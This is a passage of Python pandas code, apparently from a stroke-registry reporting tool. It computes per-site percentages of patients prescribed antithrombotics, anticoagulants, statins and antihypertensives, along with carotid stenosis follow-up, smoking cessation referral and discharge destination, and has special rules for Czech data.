self.statsDf['% patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf.loc[:, '# patients prescribed or recommended antithrombotics'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets'] + x['# patients receiving Vit. K antagonist'] + x['# patients receiving dabigatran'] + x['# patients receiving rivaroxaban'] + x['# patients receiving apixaban'] + x['# patients receiving edoxaban'] + x['# patients receiving LMWH or heparin in prophylactic dose'] + x['# patients receiving LMWH or heparin in full anticoagulant dose'] + x['# patients not prescribed antithrombotics, but recommended'], axis=1)
# From patients prescribed or recommended antithrombotics remove patient who had prescribed antithrombotics and were dead (nominator)
# self.statsDf['% patients prescribed or recommended antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed or recommended antithrombotics'] - x['ischemic_transient_dead_patients_prescribed'])/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended'])) * 100, 2) if ((x['is_tia_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended']) > 0) else 0, axis=1)
self.statsDf['% patients prescribed or recommended antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed or recommended antithrombotics'] - x['ischemic_transient_dead_patients_prescribed'])/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100, 2) if ((x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0) else 0, axis=1)
# Drop the redundant columns
self.statsDf.drop(['# patients receiving Vit. K antagonist', '# patients receiving dabigatran', '# patients receiving rivaroxaban', '# patients receiving apixaban', '# patients receiving edoxaban', '# patients receiving LMWH or heparin in prophylactic dose','# patients receiving LMWH or heparin in full anticoagulant dose'], axis=1, inplace=True)
self.statsDf.fillna(0, inplace=True)
###########################################
# ANTIPLATELETS - PRESCRIBED WITHOUT AFIB #
###########################################
afib_flutter_not_detected_or_not_known = is_tia[is_tia['AFIB_FLUTTER'].isin([4, 5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_patients'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known)
afib_flutter_not_detected_or_not_known_dead = afib_flutter_not_detected_or_not_known[afib_flutter_not_detected_or_not_known['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_dead_patients'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known_dead)
prescribed_antiplatelets_no_afib = afib_flutter_not_detected_or_not_known[afib_flutter_not_detected_or_not_known['ANTITHROMBOTICS'].isin([1])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_patients'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib)
prescribed_antiplatelets_no_afib_dead = prescribed_antiplatelets_no_afib[prescribed_antiplatelets_no_afib['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_dead_patients'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib_dead)
self.tmp = afib_flutter_not_detected_or_not_known.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients prescribed antiplatelets without aFib')
self.statsDf['% patients prescribed antiplatelets without aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antiplatelets without aFib'] - x['prescribed_antiplatelets_no_afib_dead_patients'])/(x['afib_flutter_not_detected_or_not_known_patients'] - x['afib_flutter_not_detected_or_not_known_dead_patients'])) * 100, 2) if ((x['afib_flutter_not_detected_or_not_known_patients'] - x['afib_flutter_not_detected_or_not_known_dead_patients']) > 0) else 0, axis=1)
del afib_flutter_not_detected_or_not_known, afib_flutter_not_detected_or_not_known_dead, prescribed_antiplatelets_no_afib, prescribed_antiplatelets_no_afib_dead
#########################################
# ANTICOAGULANTS - PRESCRIBED WITH AFIB #
#########################################
afib_flutter_detected = is_tia[is_tia['AFIB_FLUTTER'].isin([1, 2, 3])].copy()
self.statsDf['afib_flutter_detected_patients'] = self._count_patients(dataframe=afib_flutter_detected)
afib_flutter_detected_not_dead = afib_flutter_detected[~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_detected_patients_not_dead'] = self._count_patients(dataframe=afib_flutter_detected_not_dead)
del afib_flutter_detected_not_dead
anticoagulants_prescribed = afib_flutter_detected[
~afib_flutter_detected['ANTITHROMBOTICS'].isin([1, 10, 9]) &
~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])
].copy()
self.statsDf['# patients prescribed anticoagulants with aFib'] = self._count_patients(dataframe=anticoagulants_prescribed)
self.tmp = anticoagulants_prescribed.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
# Additional calculation
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=2, new_column_name='# patients receiving Vit. K antagonist')
# self.statsDf['% patients receiving Vit. K antagonist'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist']/x['# patients prescribed anticoagulants with aFib']) * 100), 2) if x['# patients prescribed anticoagulants with aFib'] > 0 else 0, axis=1)
self.statsDf['% patients receiving Vit. K antagonist'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=3, new_column_name='# patients receiving dabigatran')
self.statsDf['% patients receiving dabigatran'] = self.statsDf.apply(lambda x: round(((x['# patients receiving dabigatran']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=4, new_column_name='# patients receiving rivaroxaban')
self.statsDf['% patients receiving rivaroxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving rivaroxaban']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=5, new_column_name='# patients receiving apixaban')
self.statsDf['% patients receiving apixaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving apixaban']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=6, new_column_name='# patients receiving edoxaban')
self.statsDf['% patients receiving edoxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving edoxaban']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=7, new_column_name='# patients receiving LMWH or heparin in prophylactic dose')
self.statsDf['% patients receiving LMWH or heparin in prophylactic dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in prophylactic dose']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=8, new_column_name='# patients receiving LMWH or heparin in full anticoagulant dose')
self.statsDf['% patients receiving LMWH or heparin in full anticoagulant dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in full anticoagulant dose']/x['afib_flutter_detected_patients_not_dead']) * 100), 2) if x['afib_flutter_detected_patients_not_dead'] > 0 else 0, axis=1)
anticoagulants_recommended = afib_flutter_detected[afib_flutter_detected['ANTITHROMBOTICS'].isin([9])].copy()
self.statsDf['anticoagulants_recommended_patients'] = self._count_patients(dataframe=anticoagulants_recommended)
afib_flutter_detected_dead = afib_flutter_detected[afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_detected_dead_patients'] = self._count_patients(dataframe=afib_flutter_detected_dead)
self.statsDf['% patients prescribed anticoagulants with aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed anticoagulants with aFib']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients']) > 0 else 0, axis=1)
##########################################
# ANTITHROMBOTICS - PRESCRIBED WITH AFIB #
##########################################
antithrombotics_prescribed = afib_flutter_detected[~afib_flutter_detected['ANTITHROMBOTICS'].isin([9, 10]) & ~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed antithrombotics with aFib'] = self._count_patients(dataframe=antithrombotics_prescribed)
del antithrombotics_prescribed
recommended_antithrombotics_with_afib_alive = afib_flutter_detected[afib_flutter_detected['ANTITHROMBOTICS'].isin([9]) & ~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['recommended_antithrombotics_with_afib_alive_patients'] = self._count_patients(dataframe=recommended_antithrombotics_with_afib_alive)
del recommended_antithrombotics_with_afib_alive
self.statsDf['% patients prescribed antithrombotics with aFib'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with aFib']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'] - x['recommended_antithrombotics_with_afib_alive_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'] - x['recommended_antithrombotics_with_afib_alive_patients']) > 0 else 0, axis=1)
###########
# STATINS #
###########
# For CZ only patients discharged home included
if country_code == 'CZ':
is_tia_discharged_home = is_tia[is_tia['DISCHARGE_DESTINATION'].isin([1])].copy()
self.statsDf['is_tia_discharged_home_patients'] = self._count_patients(dataframe=is_tia_discharged_home)
self.tmp = is_tia_discharged_home.groupby(['Protocol ID', 'STATIN']).size().to_frame('count').reset_index()
del is_tia_discharged_home
self.statsDf = self._get_values_for_factors(column_name="STATIN", value=1, new_column_name='# patients prescribed statins - Yes')
self.statsDf['% patients prescribed statins - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Yes']/x['is_tia_discharged_home_patients']) * 100), 2) if x['is_tia_discharged_home_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STATIN", value=2, new_column_name='# patients prescribed statins - No')
self.statsDf['% patients prescribed statins - No'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - No']/x['is_tia_discharged_home_patients']) * 100), 2) if x['is_tia_discharged_home_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STATIN", value=3, new_column_name='# patients prescribed statins - Not known')
self.statsDf['% patients prescribed statins - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Not known']/x['is_tia_discharged_home_patients']) * 100), 2) if x['is_tia_discharged_home_patients'] > 0 else 0, axis=1)
else:
self.tmp = is_tia.groupby(['Protocol ID', 'STATIN']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="STATIN", value=1, new_column_name='# patients prescribed statins - Yes')
self.statsDf['% patients prescribed statins - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Yes']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STATIN", value=2, new_column_name='# patients prescribed statins - No')
self.statsDf['% patients prescribed statins - No'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - No']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STATIN", value=3, new_column_name='# patients prescribed statins - Not known')
self.statsDf['% patients prescribed statins - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed statins - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
####################
# CAROTID STENOSIS #
####################
self.tmp = is_tia.groupby(['Protocol ID', 'CAROTID_STENOSIS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=1, new_column_name='# carotid stenosis - 50%-70%')
self.statsDf['% carotid stenosis - 50%-70%'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - 50%-70%']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=2, new_column_name='# carotid stenosis - >70%')
self.statsDf['% carotid stenosis - >70%'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - >70%']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=3, new_column_name='# carotid stenosis - No')
self.statsDf['% carotid stenosis - No'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - No']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS", value=4, new_column_name='# carotid stenosis - Not known')
self.statsDf['% carotid stenosis - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
# Create a new column to be used in the graph for carotid stenosis. We were including just over 70% and we need to replace this by carotid stenosis > 50%
self.statsDf['# carotid stenosis - >50%'] = self.statsDf['# carotid stenosis - 50%-70%'] + self.statsDf['# carotid stenosis - >70%']
self.statsDf['% carotid stenosis - >50%'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis - >50%']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
##############################
# CAROTID STENOSIS FOLLOW-UP #
##############################
# Create temporary dataframe if carotid stenosis was 50-70% or > 70%
carotid_stenosis = is_tia[is_tia['CAROTID_STENOSIS'].isin([1, 2])]
self.tmp = carotid_stenosis.groupby(['Protocol ID', 'CAROTID_STENOSIS_FOLLOWUP']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=1, new_column_name='# carotid stenosis followup - Yes')
self.statsDf['% carotid stenosis followup - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - Yes']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=2, new_column_name='# carotid stenosis followup - No')
self.statsDf['% carotid stenosis followup - No'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - No']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=3, new_column_name='# carotid stenosis followup - No, but planned later')
self.statsDf['% carotid stenosis followup - No, but planned later'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - No, but planned later']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
# Create temporary dataframe if carotid stenosis was followed up or planned to follow up later
carotid_stenosis_followup = carotid_stenosis[carotid_stenosis['CAROTID_STENOSIS_FOLLOWUP'].isin([1, 3])].copy()
self.statsDf['# carotid stenosis followup - Yes, but planned'] = self._count_patients(dataframe=carotid_stenosis_followup)
self.statsDf['% carotid stenosis followup - Yes, but planned'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - Yes, but planned']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_STENOSIS_FOLLOWUP", value=4, new_column_name='# carotid stenosis followup - Referred to another centre')
self.statsDf['% carotid stenosis followup - Referred to another centre'] = self.statsDf.apply(lambda x: round(((x['# carotid stenosis followup - Referred to another centre']/x['# carotid stenosis - >50%']) * 100), 2) if x['# carotid stenosis - >50%'] > 0 else 0, axis=1)
del carotid_stenosis, carotid_stenosis_followup
#####################
# ANTIHYPERTENSIVES #
#####################
# tag::antihypertensive[]
if country_code == 'CZ':
# filter patients with recanaliztion procedure 8 and form CZ_4 (antihypertensive not shown in the new version)
discharge_subset_alive_not_returned_back = discharge_subset_alive.loc[~(discharge_subset_alive['crf_parent_name'].isin(['F_RESQ_IVT_TBY_CZ_4']) & discharge_subset_alive['RECANALIZATION_PROCEDURES'].isin([5,6,8]))].copy()
self.statsDf['discharge_subset_alive_not_returned_back_patients'] = self._count_patients(dataframe=discharge_subset_alive_not_returned_back)
self.tmp = discharge_subset_alive_not_returned_back.groupby(['Protocol ID', 'ANTIHYPERTENSIVE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=3, new_column_name='# prescribed antihypertensives - Not known')
self.statsDf['% prescribed antihypertensives - Not known'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Not known']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=1, new_column_name='# prescribed antihypertensives - Yes')
self.statsDf['% prescribed antihypertensives - Yes'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Yes']/(x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=2, new_column_name='# prescribed antihypertensives - No')
self.statsDf['% prescribed antihypertensives - No'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - No']/(x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
else:
self.tmp = discharge_subset_alive.groupby(['Protocol ID', 'ANTIHYPERTENSIVE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=3, new_column_name='# prescribed antihypertensives - Not known')
self.statsDf['% prescribed antihypertensives - Not known'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Not known']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=1, new_column_name='# prescribed antihypertensives - Yes')
self.statsDf['% prescribed antihypertensives - Yes'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - Yes']/(x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTIHYPERTENSIVE", value=2, new_column_name='# prescribed antihypertensives - No')
self.statsDf['% prescribed antihypertensives - No'] = self.statsDf.apply(lambda x: round(((x['# prescribed antihypertensives - No']/(x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['# prescribed antihypertensives - Not known']) > 0 else 0, axis=1)
# end::antihypertensive[]
#####################
# SMOKING CESSATION #
#####################
# tag::smoking[]
if country_code == 'CZ':
self.tmp = discharge_subset_alive_not_returned_back.groupby(['Protocol ID', 'SMOKING_CESSATION']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=3, new_column_name='# recommended to a smoking cessation program - not a smoker')
self.statsDf['% recommended to a smoking cessation program - not a smoker'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - not a smoker']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=1, new_column_name='# recommended to a smoking cessation program - Yes')
self.statsDf['% recommended to a smoking cessation program - Yes'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - Yes']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=2, new_column_name='# recommended to a smoking cessation program - No')
self.statsDf['% recommended to a smoking cessation program - No'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - No']/x['discharge_subset_alive_not_returned_back_patients']) * 100), 2) if x['discharge_subset_alive_not_returned_back_patients'] > 0 else 0, axis=1)
else:
self.tmp = discharge_subset_alive.groupby(['Protocol ID', 'SMOKING_CESSATION']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=3, new_column_name='# recommended to a smoking cessation program - not a smoker')
self.statsDf['% recommended to a smoking cessation program - not a smoker'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - not a smoker']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=1, new_column_name='# recommended to a smoking cessation program - Yes')
self.statsDf['% recommended to a smoking cessation program - Yes'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - Yes']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="SMOKING_CESSATION", value=2, new_column_name='# recommended to a smoking cessation program - No')
self.statsDf['% recommended to a smoking cessation program - No'] = self.statsDf.apply(lambda x: round(((x['# recommended to a smoking cessation program - No']/x['discharge_subset_alive_patients']) * 100), 2) if x['discharge_subset_alive_patients'] > 0 else 0, axis=1)
# end::smoking[]
##########################
# CEREBROVASCULAR EXPERT #
##########################
# tag::cerebrovascular_expert[]
if country_code == 'CZ':
self.tmp = discharge_subset_alive_not_returned_back.groupby(['Protocol ID', 'CEREBROVASCULAR_EXPERT']).size().to_frame('count').reset_index()
# Claculate number of patients entered to the old form
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=1, new_column_name='# recommended to a cerebrovascular expert - Recommended, and appointment was made')
self.statsDf['% recommended to a cerebrovascular expert - Recommended, and appointment was made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, and appointment was made']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=2, new_column_name='# recommended to a cerebrovascular expert - Recommended, but appointment was not made')
self.statsDf['% recommended to a cerebrovascular expert - Recommended, but appointment was not made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.loc[:, '# recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: x['# recommended to a cerebrovascular expert - Recommended, and appointment was made'] + x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made'], axis=1)
self.statsDf['% recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=3, new_column_name='# recommended to a cerebrovascular expert - Not recommended')
self.statsDf['% recommended to a cerebrovascular expert - Not recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Not recommended']/(x['discharge_subset_alive_not_returned_back_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_not_returned_back_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
else:
self.tmp = discharge_subset_alive.groupby(['Protocol ID', 'CEREBROVASCULAR_EXPERT']).size().to_frame('count').reset_index()
# Claculate number of patients entered to the old form
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=1, new_column_name='# recommended to a cerebrovascular expert - Recommended, and appointment was made')
self.statsDf['% recommended to a cerebrovascular expert - Recommended, and appointment was made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, and appointment was made']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=2, new_column_name='# recommended to a cerebrovascular expert - Recommended, but appointment was not made')
self.statsDf['% recommended to a cerebrovascular expert - Recommended, but appointment was not made'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.loc[:, '# recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: x['# recommended to a cerebrovascular expert - Recommended, and appointment was made'] + x['# recommended to a cerebrovascular expert - Recommended, but appointment was not made'], axis=1)
self.statsDf['% recommended to a cerebrovascular expert - Recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Recommended']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CEREBROVASCULAR_EXPERT", value=3, new_column_name='# recommended to a cerebrovascular expert - Not recommended')
self.statsDf['% recommended to a cerebrovascular expert - Not recommended'] = self.statsDf.apply(lambda x: round(((x['# recommended to a cerebrovascular expert - Not recommended']/(x['discharge_subset_alive_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_alive_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
# end::cerebrovascular_expert[]
#########################
# DISCHARGE DESTINATION #
#########################
self.tmp = discharge_subset.groupby(['Protocol ID', 'DISCHARGE_DESTINATION']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_DESTINATION", value=1, new_column_name='# discharge destination - Home')
self.statsDf['% discharge destination - Home'] = self.statsDf.apply(lambda x: round(((x['# discharge destination - Home']/x['discharge_subset_patients']) * 100), 2) if x['discharge_subset_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_DESTINATION", value=2, new_column_name='# discharge destination - Transferred within the same centre')
self.statsDf['% discharge destination - Transferred within the same centre'] = self.statsDf.apply(lambda x: round(((x['# discharge destination - Transferred within the same centre']/x['discharge_subset_patients']) * 100), 2) if x['discharge_subset_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_DESTINATION", value=3, new_column_name='# discharge destination - Transferred to another centre')
self.statsDf['% discharge destination - Transferred to another centre'] = self.statsDf.apply(lambda x: round(((x['# discharge destination - Transferred to another centre']/x['discharge_subset_patients']) * 100), 2) if x['discharge_subset_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_DESTINATION", value=4, new_column_name='# discharge destination - Social care facility')
self.statsDf['% discharge destination - Social care facility'] = self.statsDf.apply(lambda x: round(((x['# discharge destination - Social care facility']/x['discharge_subset_patients']) * 100), 2) if x['discharge_subset_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_DESTINATION", value=5, new_column_name='# discharge destination - Dead')
self.statsDf['% discharge destination - Dead'] = self.statsDf.apply(lambda x: round(((x['# discharge destination - Dead']/x['discharge_subset_patients']) * 100), 2) if x['discharge_subset_patients'] > 0 else 0, axis=1)
#######################################
# DISCHARGE DESTINATION - SAME CENTRE #
#######################################
discharge_subset_same_centre = discharge_subset[discharge_subset['DISCHARGE_DESTINATION'].isin([2])].copy()
self.statsDf['discharge_subset_same_centre_patients'] = self._count_patients(dataframe=discharge_subset_same_centre)
self.tmp = discharge_subset_same_centre.groupby(['Protocol ID', 'DISCHARGE_SAME_FACILITY']).size().to_frame('count').reset_index()
del discharge_subset_same_centre
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_SAME_FACILITY", value=1, new_column_name='# transferred within the same centre - Acute rehabilitation')
self.statsDf['% transferred within the same centre - Acute rehabilitation'] = self.statsDf.apply(lambda x: round(((x['# transferred within the same centre - Acute rehabilitation']/x['discharge_subset_same_centre_patients']) * 100), 2) if x['discharge_subset_same_centre_patients'] > 0 else 0, axis=1)
